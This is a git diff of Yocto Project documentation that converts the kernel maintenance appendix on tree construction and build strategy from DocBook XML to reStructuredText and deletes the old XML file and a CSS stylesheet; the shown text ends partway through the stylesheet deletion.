+heading "Yocto Linux Kernel" at :yocto_git:`/` and
+are shipped as part of a Yocto Project release. The team creates these
+repositories by compiling and executing the set of feature descriptions
+for every BSP and feature in the product. Those feature descriptions
+list all necessary patches, configurations, branches, tags, and feature
+divisions found in a Yocto Linux kernel. Thus, the Yocto Project Linux
+kernel repository (or tree) and accompanying Metadata in the
+``yocto-kernel-cache`` are built.
+
+The existence of these repositories allow you to access and clone a
+particular Yocto Project Linux kernel repository and use it to build
+images based on their configurations and features.
+
+You can find the files used to describe all the valid features and BSPs
+in the Yocto Project Linux kernel in any clone of the Yocto Project
+Linux kernel source repository and ``yocto-kernel-cache`` Git trees. For
+example, the following commands clone the Yocto Project baseline Linux
+kernel that branches off ``linux.org`` version 4.12 and the
+``yocto-kernel-cache``, which contains stores of kernel Metadata:
+::
+
+   $ git clone git://git.yoctoproject.org/linux-yocto-4.12
+   $ git clone git://git.yoctoproject.org/linux-kernel-cache
+
+For more information on
+how to set up a local Git repository of the Yocto Project Linux kernel
+files, see the
+":ref:`kernel-dev/kernel-dev-common:preparing the build host to work on the kernel`"
+section.
+
+Once you have cloned the kernel Git repository and the cache of Metadata
+on your local machine, you can discover the branches that are available
+in the repository using the following Git command:
+::
+
+   $ git branch -a
+
+Checking out a branch allows you to work with a particular Yocto Linux
+kernel. For example, the following commands check out the
+"standard/beagleboard" branch of the Yocto Linux kernel repository and
+the "yocto-4.12" branch of the ``yocto-kernel-cache`` repository:
+::
+
+   $ cd ~/linux-yocto-4.12
+   $ git checkout -b my-kernel-4.12 remotes/origin/standard/beagleboard
+   $ cd ~/linux-kernel-cache
+   $ git checkout -b my-4.12-metadata remotes/origin/yocto-4.12
+
+.. note::
+
+   Branches in the ``yocto-kernel-cache`` repository correspond to Yocto Linux
+   kernel versions (e.g. "yocto-4.12", "yocto-4.10", "yocto-4.9", and so forth).
+
+Once you have checked out and switched to appropriate branches, you can
+see a snapshot of all the kernel source files used to used to build that
+particular Yocto Linux kernel for a particular board.
+
+To see the features and configurations for a particular Yocto Linux
+kernel, you need to examine the ``yocto-kernel-cache`` Git repository.
+As mentioned, branches in the ``yocto-kernel-cache`` repository
+correspond to Yocto Linux kernel versions (e.g. ``yocto-4.12``).
+Branches contain descriptions in the form of ``.scc`` and ``.cfg``
+files.
+
+You should realize, however, that browsing your local
+``yocto-kernel-cache`` repository for feature descriptions and patches
+is not an effective way to determine what is in a particular kernel
+branch. Instead, you should use Git directly to discover the changes in
+a branch. Using Git is an efficient and flexible way to inspect changes
+to the kernel.
+
+.. note::
+
+   Ground up reconstruction of the complete kernel tree is an action
+   only taken by the Yocto Project team during an active development
+   cycle. When you create a clone of the kernel Git repository, you are
+   simply making it efficiently available for building and development.
+
+The following steps describe what happens when the Yocto Project Team
+constructs the Yocto Project kernel source Git repository (or tree)
+found at :yocto_git:`/` given the introduction of a new
+top-level kernel feature or BSP. The following actions effectively
+provide the Metadata and create the tree that includes the new feature,
+patch, or BSP:
+
+1. *Pass Feature to the OpenEmbedded Build System:* A top-level kernel
+   feature is passed to the kernel build subsystem. Normally, this
+   feature is a BSP for a particular kernel type.
+
+2. *Locate Feature:* The file that describes the top-level feature is
+   located by searching these system directories:
+
+   -  The in-tree kernel-cache directories, which are located in the
+      :yocto_git:`yocto-kernel-cache </cgit/cgit.cgi/yocto-kernel-cache/tree/bsp>`
+      repository organized under the "Yocto Linux Kernel" heading in the
+      :yocto_git:`Yocto Project Source Repositories <>`.
+
+   -  Areas pointed to by ``SRC_URI`` statements found in kernel recipes.
+
+   For a typical build, the target of the search is a feature
+   description in an ``.scc`` file whose name follows this format (e.g.
+   ``beaglebone-standard.scc`` and ``beaglebone-preempt-rt.scc``):
+   ::
+
+      bsp_root_name-kernel_type.scc
+
+3. *Expand Feature:* Once located, the feature description is either
+   expanded into a simple script of actions, or into an existing
+   equivalent script that is already part of the shipped kernel.
+
+4. *Append Extra Features:* Extra features are appended to the top-level
+   feature description. These features can come from the
+   :term:`KERNEL_FEATURES`
+   variable in recipes.
+
+5. *Locate, Expand, and Append Each Feature:* Each extra feature is
+   located, expanded and appended to the script as described in step
+   three.
+
+6. *Execute the Script:* The script is executed to produce files
+   ``.scc`` and ``.cfg`` files in appropriate directories of the
+   ``yocto-kernel-cache`` repository. These files are descriptions of
+   all the branches, tags, patches and configurations that need to be
+   applied to the base Git repository to completely create the source
+   (build) branch for the new BSP or feature.
+
+7. *Clone Base Repository:* The base repository is cloned, and the
+   actions listed in the ``yocto-kernel-cache`` directories are applied
+   to the tree.
+
+8. *Perform Cleanup:* The Git repositories are left with the desired
+   branches checked out and any required branching, patching and tagging
+   has been performed.
+
+The kernel tree and cache are ready for developer consumption to be
+locally cloned, configured, and built into a Yocto Project kernel
+specific to some target hardware.
+
+.. note::
+
+   -  The generated ``yocto-kernel-cache`` repository adds to the kernel
+      as shipped with the Yocto Project release. Any add-ons and
+      configuration data are applied to the end of an existing branch.
+      The full repository generation that is found in the official Yocto
+      Project kernel repositories at :yocto_git:`/` is the
+      combination of all supported boards and configurations.
+
+   -  The technique the Yocto Project team uses is flexible and allows
+      for seamless blending of an immutable history with additional
+      patches specific to a deployment. Any additions to the kernel
+      become an integrated part of the branches.
+
+   -  The full kernel tree that you see on :yocto_git:`/` is
+      generated through repeating the above steps for all valid BSPs.
+      The end result is a branched, clean history tree that makes up the
+      kernel for a given release. You can see the script (``kgit-scc``)
+      responsible for this in the
+      :yocto_git:`yocto-kernel-tools </cgit.cgi/yocto-kernel-tools/tree/tools>`
+      repository.
+
+   -  The steps used to construct the full kernel tree are the same
+      steps that BitBake uses when it builds a kernel image.
+
+Build Strategy
+==============
+
+Once you have cloned a Yocto Linux kernel repository and the cache
+repository (``yocto-kernel-cache``) onto your development system, you
+can consider the compilation phase of kernel development, which is
+building a kernel image. Some prerequisites exist that are validated by
+the build process before compilation starts:
+
+-  The :term:`SRC_URI` points to the
+   kernel Git repository.
+
+-  A BSP build branch with Metadata exists in the ``yocto-kernel-cache``
+   repository. The branch is based on the Yocto Linux kernel version and
+   has configurations and features grouped under the
+   ``yocto-kernel-cache/bsp`` directory. For example, features and
+   configurations for the BeagleBone Board assuming a
+   ``linux-yocto_4.12`` kernel reside in the following area of the
+   ``yocto-kernel-cache`` repository: yocto-kernel-cache/bsp/beaglebone
+
+   .. note::
+
+      In the previous example, the "yocto-4.12" branch is checked out in
+      the ``yocto-kernel-cache`` repository.
+
+The OpenEmbedded build system makes sure these conditions exist before
+attempting compilation. Other means, however, do exist, such as
+bootstrapping a BSP.
+
+Before building a kernel, the build process verifies the tree and
+configures the kernel by processing all of the configuration "fragments"
+specified by feature descriptions in the ``.scc`` files. As the features
+are compiled, associated kernel configuration fragments are noted and
+recorded in the series of directories in their compilation order. The
+fragments are migrated, pre-processed and passed to the Linux Kernel
+Configuration subsystem (``lkc``) as raw input in the form of a
+``.config`` file. The ``lkc`` uses its own internal dependency
+constraints to do the final processing of that information and generates
+the final ``.config`` file that is used during compilation.
+
+Using the board's architecture and other relevant values from the
+board's template, kernel compilation is started and a kernel image is
+produced.
+
+The other thing that you notice once you configure a kernel is that the
+build process generates a build tree that is separate from your kernel's
+local Git source repository tree. This build tree has a name that uses
+the following form, where ``${MACHINE}`` is the metadata name of the
+machine (BSP) and "kernel_type" is one of the Yocto Project supported
+kernel types (e.g. "standard"):
+::
+
+   linux-${MACHINE}-kernel_type-build
+
+The existing support in the ``kernel.org`` tree achieves this default
+functionality.
+
+This behavior means that all the generated files for a particular
+machine or BSP are now in the build tree directory. The files include
+the final ``.config`` file, all the ``.o`` files, the ``.a`` files, and
+so forth. Since each machine or BSP has its own separate
+:term:`Build Directory` in its own separate
+branch of the Git repository, you can easily switch between different
+builds.
diff --git a/documentation/kernel-dev/kernel-dev-maint-appx.xml b/documentation/kernel-dev/kernel-dev-maint-appx.xml
deleted file mode 100644
index b825ae7ea5..0000000000
--- a/documentation/kernel-dev/kernel-dev-maint-appx.xml
+++ /dev/null
@@ -1,356 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<appendix id='kernel-dev-maint-appx'>
-<title>Kernel Maintenance</title>
-
-    <section id='tree-construction'>
-        <title>Tree Construction</title>
-
-        <para>
-            This section describes construction of the Yocto Project kernel
-            source repositories as accomplished by the Yocto Project team to
-            create Yocto Linux kernel repositories.
-            These kernel repositories are found under the heading "Yocto Linux
-            Kernel" at
-            <ulink url='&YOCTO_GIT_URL;'>&YOCTO_GIT_URL;</ulink>
-            and are shipped as part of a Yocto Project release.
-            The team creates these repositories by compiling and executing the
-            set of feature descriptions for every BSP and feature in the
-            product.
-            Those feature descriptions list all necessary patches,
-            configurations, branches, tags, and feature divisions found in a
-            Yocto Linux kernel.
-            Thus, the Yocto Project Linux kernel repository (or tree) and
-            accompanying Metadata in the
-            <filename>yocto-kernel-cache</filename> are built.
-        </para>
-
-        <para>
-            The existence of these repositories allow you to access and clone a
-            particular Yocto Project Linux kernel repository and use it to
-            build images based on their configurations and features.
-        </para>
-
-        <para>
-            You can find the files used to describe all the valid features and
-            BSPs in the Yocto Project Linux kernel in any clone of the Yocto
-            Project Linux kernel source repository and
-            <filename>yocto-kernel-cache</filename> Git trees.
-            For example, the following commands clone the Yocto Project
-            baseline Linux kernel that branches off
-            <filename>linux.org</filename> version 4.12 and the
-            <filename>yocto-kernel-cache</filename>, which contains stores of
-            kernel Metadata:
-            <literallayout class='monospaced'>
-     $ git clone git://git.yoctoproject.org/linux-yocto-4.12
-     $ git clone git://git.yoctoproject.org/linux-kernel-cache
-            </literallayout>
-            For more information on how to set up a local Git repository of
-            the Yocto Project Linux kernel files, see the
-            "<link linkend='preparing-the-build-host-to-work-on-the-kernel'>Preparing the Build Host to Work on the Kernel</link>"
-            section.
-        </para>
-
-        <para>
-            Once you have cloned the kernel Git repository and the
-            cache of Metadata on your local machine, you can discover the
-            branches that are available in the repository using the following
-            Git command:
-            <literallayout class='monospaced'>
-     $ git branch -a
-            </literallayout>
-            Checking out a branch allows you to work with a particular
-            Yocto Linux kernel.
-            For example, the following commands check out the
-            "standard/beagleboard" branch of the Yocto Linux kernel repository
-            and the "yocto-4.12" branch of the
-            <filename>yocto-kernel-cache</filename> repository:
-            <literallayout class='monospaced'>
-     $ cd ~/linux-yocto-4.12
-     $ git checkout -b my-kernel-4.12 remotes/origin/standard/beagleboard
-     $ cd ~/linux-kernel-cache
-     $ git checkout -b my-4.12-metadata remotes/origin/yocto-4.12
-            </literallayout>
-            <note>
-                Branches in the <filename>yocto-kernel-cache</filename>
-                repository correspond to Yocto Linux kernel versions
-                (e.g. "yocto-4.12", "yocto-4.10", "yocto-4.9", and so forth).
-            </note>
-            Once you have checked out and switched to appropriate branches,
-            you can see a snapshot of all the kernel source files used to
-            used to build that particular Yocto Linux kernel for a
-            particular board.
-        </para>
-
-        <para>
-            To see the features and configurations for a particular Yocto
-            Linux kernel, you need to examine the
-            <filename>yocto-kernel-cache</filename> Git repository.
-            As mentioned, branches in the
-            <filename>yocto-kernel-cache</filename> repository correspond to
-            Yocto Linux kernel versions (e.g. <filename>yocto-4.12</filename>).
-            Branches contain descriptions in the form of
-            <filename>.scc</filename> and <filename>.cfg</filename> files.
-        </para>
-
-        <para>
-            You should realize, however, that browsing your local
-            <filename>yocto-kernel-cache</filename> repository for feature
-            descriptions and patches is not an effective way to determine what
-            is in a particular kernel branch.
-            Instead, you should use Git directly to discover the changes in
-            a branch.
-            Using Git is an efficient and flexible way to inspect changes to
-            the kernel.
-            <note>
-                Ground up reconstruction of the complete kernel tree is an
-                action only taken by the Yocto Project team during an active
-                development cycle.
-                When you create a clone of the kernel Git repository, you are
-                simply making it efficiently available for building and
-                development.
-            </note>
-        </para>
-
-        <para>
-            The following steps describe what happens when the Yocto Project
-            Team constructs the Yocto Project kernel source Git repository
-            (or tree) found at
-            <ulink url='&YOCTO_GIT_URL;'></ulink> given the
-            introduction of a new top-level kernel feature or BSP.
-            The following actions effectively provide the Metadata
-            and create the tree that includes the new feature, patch, or BSP:
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Pass Feature to the OpenEmbedded Build System:</emphasis>
-                    A top-level kernel feature is passed to the kernel build
-                    subsystem.
-                    Normally, this feature is a BSP for a particular kernel
-                    type.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Locate Feature:</emphasis>
-                    The file that describes the top-level feature is located
-                    by searching these system directories:
-                    <itemizedlist>
-                        <listitem><para>
-                            The in-tree kernel-cache directories, which are
-                            located in the
-                            <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/yocto-kernel-cache/tree/bsp'><filename>yocto-kernel-cache</filename></ulink>
-                            repository organized under the "Yocto Linux Kernel"
-                            heading in the
-                            <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi'>Yocto Project Source Repositories</ulink>.
-                            </para></listitem>
-                        <listitem><para>
-                            Areas pointed to by <filename>SRC_URI</filename>
-                            statements found in kernel recipes
-                            </para></listitem>
-                    </itemizedlist>
-                    For a typical build, the target of the search is a
-                    feature description in an <filename>.scc</filename> file
-                    whose name follows this format (e.g.
-                    <filename>beaglebone-standard.scc</filename> and
-                    <filename>beaglebone-preempt-rt.scc</filename>):
-                    <literallayout class='monospaced'>
-     <replaceable>bsp_root_name</replaceable>-<replaceable>kernel_type</replaceable>.scc
-                    </literallayout>
-                </para></listitem>
-                <listitem><para>
-                    <emphasis>Expand Feature:</emphasis>
-                    Once located, the feature description is either expanded
-                    into a simple script of actions, or into an existing
-                    equivalent script that is already part of the shipped
-                    kernel.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Append Extra Features:</emphasis>
-                    Extra features are appended to the top-level feature
-                    description.
-                    These features can come from the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_FEATURES'><filename>KERNEL_FEATURES</filename></ulink>
-                    variable in recipes.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Locate, Expand, and Append Each Feature:</emphasis>
-                    Each extra feature is located, expanded and appended to
-                    the script as described in step three.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Execute the Script:</emphasis>
-                    The script is executed to produce files
-                    <filename>.scc</filename> and <filename>.cfg</filename>
-                    files in appropriate directories of the
-                    <filename>yocto-kernel-cache</filename> repository.
-                    These files are descriptions of all the branches, tags,
-                    patches and configurations that need to be applied to the
-                    base Git repository to completely create the
-                    source (build) branch for the new BSP or feature.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Clone Base Repository:</emphasis>
-                    The base repository is cloned, and the actions
-                    listed in the <filename>yocto-kernel-cache</filename>
-                    directories are applied to the tree.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Perform Cleanup:</emphasis>
-                    The Git repositories are left with the desired branches
-                    checked out and any required branching, patching and
-                    tagging has been performed.
-                    </para></listitem>
-            </orderedlist>
-        </para>
-
-        <para>
-            The kernel tree and cache are ready for developer consumption to
-            be locally cloned, configured, and built into a Yocto Project
-            kernel specific to some target hardware.
-            <note><title>Notes</title>
-                <itemizedlist>
-                    <listitem><para>
-                        The generated <filename>yocto-kernel-cache</filename>
-                        repository adds to the kernel as shipped with the Yocto
-                        Project release.
-                        Any add-ons and configuration data are applied to the
-                        end of an existing branch.
-                        The full repository generation that is found in the
-                        official Yocto Project kernel repositories at
-                        <ulink url='&YOCTO_GIT_URL;'>http://git.yoctoproject.org</ulink>
-                        is the combination of all supported boards and
-                        configurations.
-                        </para></listitem>
-                    <listitem><para>
-                        The technique the Yocto Project team uses is flexible
-                        and allows for seamless blending of an immutable
-                        history with additional patches specific to a
-                        deployment.
-                        Any additions to the kernel become an integrated part
-                        of the branches.
-                        </para></listitem>
-                    <listitem><para>
-                        The full kernel tree that you see on
-                        <ulink url='&YOCTO_GIT_URL;'></ulink> is
-                        generated through repeating the above steps for all
-                        valid BSPs.
-                        The end result is a branched, clean history tree that
-                        makes up the kernel for a given release.
-                        You can see the script (<filename>kgit-scc</filename>)
-                        responsible for this in the
-                        <ulink url='&YOCTO_GIT_URL;/cgit.cgi/yocto-kernel-tools/tree/tools'><filename>yocto-kernel-tools</filename></ulink>
-                        repository.
-                        </para></listitem>
-                    <listitem><para>
-                        The steps used to construct the full kernel tree are
-                        the same steps that BitBake uses when it builds a
-                        kernel image.
-                        </para></listitem>
-                </itemizedlist>
-            </note>
-        </para>
-    </section>
-
-    <section id='build-strategy'>
-        <title>Build Strategy</title>
-
-        <para>
-            Once you have cloned a Yocto Linux kernel repository and the
-            cache repository (<filename>yocto-kernel-cache</filename>) onto
-            your development system, you can consider the compilation phase
-            of kernel development, which is building a kernel image.
-            Some prerequisites exist that are validated by the build process
-            before compilation starts:
-        </para>
-
-        <itemizedlist>
-            <listitem><para>
-                The
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                points to the kernel Git repository.
-                </para></listitem>
-            <listitem><para>
-                A BSP build branch with Metadata exists in the
-                <filename>yocto-kernel-cache</filename> repository.
-                The branch is based on the Yocto Linux kernel version and
-                has configurations and features grouped under the
-                <filename>yocto-kernel-cache/bsp</filename> directory.
-                For example, features and configurations for the
-                BeagleBone Board assuming a
-                <filename>linux-yocto_4.12</filename> kernel reside in the
-                following area of the <filename>yocto-kernel-cache</filename>
-                repository:
-                <literallayout class='monospaced'>
-     yocto-kernel-cache/bsp/beaglebone
-                </literallayout>
-                <note>
-                    In the previous example, the "yocto-4.12" branch is
-                    checked out in the <filename>yocto-kernel-cache</filename>
-                    repository.
-                </note>
-                </para></listitem>
-        </itemizedlist>
-
-        <para>
-            The OpenEmbedded build system makes sure these conditions exist
-            before attempting compilation.
-            Other means, however, do exist, such as as bootstrapping a BSP.
-        </para>
-
-        <para>
-            Before building a kernel, the build process verifies the tree
-            and configures the kernel by processing all of the
-            configuration "fragments" specified by feature descriptions
-            in the <filename>.scc</filename> files.
-            As the features are compiled, associated kernel configuration
-            fragments are noted and recorded in the series of directories
-            in their compilation order.
-            The fragments are migrated, pre-processed and passed to the
-            Linux Kernel Configuration subsystem (<filename>lkc</filename>) as
-            raw input in the form of a <filename>.config</filename> file.
-            The <filename>lkc</filename> uses its own internal dependency
-            constraints to do the final processing of that information and
-            generates the final <filename>.config</filename> file that is used
-            during compilation.
-        </para>
-
-        <para>
-            Using the board's architecture and other relevant values from
-            the board's template, kernel compilation is started and a kernel
-            image is produced.
-        </para>
-
-        <para>
-            The other thing that you notice once you configure a kernel is that
-            the build process generates a build tree that is separate from
-            your kernel's local Git source repository tree.
-            This build tree has a name that uses the following form, where
-            <filename>${MACHINE}</filename> is the metadata name of the
-            machine (BSP) and "kernel_type" is one of the Yocto Project
-            supported kernel types (e.g. "standard"):
-        <literallayout class='monospaced'>
-     linux-${MACHINE}-<replaceable>kernel_type</replaceable>-build
-        </literallayout>
-        </para>
-
-        <para>
-            The existing support in the <filename>kernel.org</filename> tree
-            achieves this default functionality.
-        </para>
-
-        <para>
-            This behavior means that all the generated files for a particular
-            machine or BSP are now in the build tree directory.
-            The files include the final <filename>.config</filename> file,
-            all the <filename>.o</filename> files, the <filename>.a</filename>
-            files, and so forth.
-            Since each machine or BSP has its own separate
-            <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-            in its own separate branch of the Git repository, you can easily
-            switch between different builds.
-        </para>
-    </section>
-</appendix>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/kernel-dev/kernel-dev-style.css b/documentation/kernel-dev/kernel-dev-style.css
deleted file mode 100644
index 9c01aa7983..0000000000
--- a/documentation/kernel-dev/kernel-dev-style.css
+++ /dev/null
@@ -1,988 +0,0 @@
-/*
-   Generic XHTML / DocBook XHTML CSS Stylesheet.
-
-   Browser wrangling and typographic design by
-      Oyvind Kolas / pippin@gimp.org
-
-   Customised for Poky by
-      Matthew Allum / mallum@o-hand.com
-
-   Thanks to:
-     Liam R. E. Quin
-     William Skaggs
-     Jakub Steiner
-
-   Structure
-   ---------
-
-   The stylesheet is divided into the following sections:
-
-       Positioning
-          Margins, paddings, width, font-size, clearing.
-       Decorations
-          Borders, style
-       Colors
-          Colors
-       Graphics
-          Graphical backgrounds
-       Nasty IE tweaks
-          Workarounds needed to make it work in internet explorer,
-          currently makes the stylesheet non validating, but up until
-          this point it is validating.
-       Mozilla extensions
-          Transparency for footer
-	  Rounded corners on boxes
-
-*/
-
-
-  /*************** /
- /  Positioning   /
-/ ***************/
-
-body {
-  font-family: Verdana, Sans, sans-serif;
-
-  min-width: 640px;
-  width: 80%;
-  margin:  0em auto;
-  padding: 2em 5em 5em 5em;
-  color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
-  font-family: Arial, Sans;
-  color: #00557D;
-  clear: both;
-}
-
-h1 {
-  font-size: 2em;
-  text-align: left;
-  padding: 0em 0em 0em 0em;
-  margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
-  margin: 0.10em 0em 3.0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 1.8em;
-  padding-left: 20%;
-  font-weight: normal;
-  font-style: italic;
-}
-
-h2 {
-  margin: 2em 0em 0.66em 0em;
-  padding: 0.5em 0em 0em 0em;
-  font-size: 1.5em;
-  font-weight: bold;
-}
-
-h3.subtitle {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 142.14%;
-  text-align: right;
-}
-
-h3 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 140%;
-  font-weight: bold;
-}
-
-h4 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 120%;
-  font-weight: bold;
-}
-
-h5 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-h6 {
-  margin: 1em 0em 0em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-.authorgroup {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  padding-top: 256px;
-  background-image: url("figures/kernel-dev-title.png");
-  background-position: left top;
-  margin-top: -256px;
-  padding-right: 50px;
-  margin-left: 0px;
-  text-align: right;
-  width: 740px;
-}
-
-h3.author {
-  margin: 0em 0me 0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-weight: normal;
-  font-size: 100%;
-  color: #333;
-  clear: both;
-}
-
-.author tt.email {
-  font-size: 66%;
-}
-
-.titlepage hr {
-  width: 0em;
-  clear: both;
-}
-
-.revhistory {
-  padding-top: 2em;
-  clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
-  padding: 1.33em 0em 2.5em 0em;
-  color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
-  padding: 0em 0em 0em 0em;
-  padding: 0em 0em 0.3em;
-  margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
-  font-size: 100.0%;
-  font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
-  margin: 0em 0em 0.5em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
-  margin: 0em 0em 0em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
-  margin: 0em 0em 0em 2.6em;
-  padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  font-weight: normal;
-  width: 20em;
-  text-align: right;
-}
-
-.variablelist dl dt {
-  margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
-  margin-top: -1em;
-  margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
-  padding: 0em 0em 0em 0em;
-  margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-div p.copyright {
-  text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
-  margin-bottom: 0em;
-}
-
-p {
-  line-height: 1.5em;
-  margin-top: 0em;
-
-}
-
-dl {
-  padding-top: 0em;
-}
-
-hr {
-  border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
-  text-align: center;
-}
-
-img {
-  border: none;
-}
-
-ul {
-  padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
-  padding: 0em 0em 0em 0em;
-}
-
-ul li p {
-  text-align: left;
-}
-
-table {
-  width :100%;
-}
-
-th {
-  padding: 0.25em;
-  text-align: left;
-  font-weight: normal;
-  vertical-align: top;
-}
-
-td {
-  padding: 0.25em;
-  vertical-align: top;
-}
-
-p a[id] {
-  margin: 0px;
-  padding: 0px;
-  display: inline;
-  background-image: none;
-}
-
-a {
-  text-decoration: underline;
-  color: #444;
-}
-
-pre {
-    overflow: auto;
-}
-
-a:hover {
-  text-decoration: underline;
-  /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
-   appears by itself and when hovered over with
-   the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
-  margin: 1em 0em;
-  padding: 1em;
-  page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
-    padding-top: 0em;
-    margin-top: 0em;
-    font-size: 100%;
-    font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p  {
-  text-align: center;
-  font-size: 80%;
-  padding-top: 0.5em;
-  padding-bottom: 0.5em;
-}
-
-.epigraph {
-  padding-left: 55%;
-  margin-bottom: 1em;
-}
-
-.epigraph p {
-  text-align: left;
-}
-
-.epigraph .quote {
-  font-style: italic;
-}
-.epigraph .attribution {
-  font-style: normal;
-  text-align: right;
-}
-
-span.application {
-  font-style: italic;
-}
-
-.programlisting {
-  font-family: monospace;
-  font-size: 80%;
-  white-space: pre;
-  margin: 1.33em 0em;
-  padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
-  margin-top: 1em;
-  margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
-  border: none;
-  width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  padding: 0.8em 0.0em 0.0em 0.0em;
-  margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
-  margin-top: 0.5em;
-  margin-bottom: 0.5em;
-  padding-right: 1em;
-  text-align: left;
-}
-
-.acronym {
-  text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
-  padding: 0.09em 0.3em;
-  margin: 0em;
-}
-
-.itemizedlist li {
-  clear: none;
-}
-
-.filename {
-  font-size: medium;
-  font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
-  position: absolute;
-  left: 0em;
-  top: 0em;
-  width: 100%;
-  background-color: #cdf;
-  width: 100%;
-}
-
-div.navfooter, div.footing{
-  position: fixed;
-  left: 0em;
-  bottom: 0em;
-  background-color: #eee;
-  width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
-  font-size: 66%;
-}
-
-div.navheader table th {
-  /*font-family: Georgia, Times, serif;*/
-  /*font-size: x-large;*/
-  font-size: 80%;
-}
-
-div.navheader table {
-  border-left: 0em;
-  border-right: 0em;
-  border-top: 0em;
-  width: 100%;
-}
-
-div.navfooter table {
-  border-left: 0em;
-  border-right: 0em;
-  border-bottom: 0em;
-  width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
-  color: #777;
-  text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
-  color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
-  color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
-  text-decoration: underline;
-  background-color: transparent;
-  color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
-  display: none;
-}
-
-
-.qandaset tr.question td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-.answer td {
-  padding-bottom: 1.5em;
-}
-
-.emphasis {
-  font-weight: bold;
-}
-
-
-  /************* /
- / decorations  /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
-    border: none;
-}
-
-/*
-h1 {
-  border: none;
-}
-
-h2 {
-  border-top: solid 0.2em;
-  border-bottom: solid 0.06em;
-}
-
-h3 {
-  border-top: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h4 {
-  border: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h5 {
-  border: 0em;
-}
-*/
-
-.programlisting {
-  border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
-  border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
-  border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom: 1px solid;
-}
-
-.question td {
-  border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
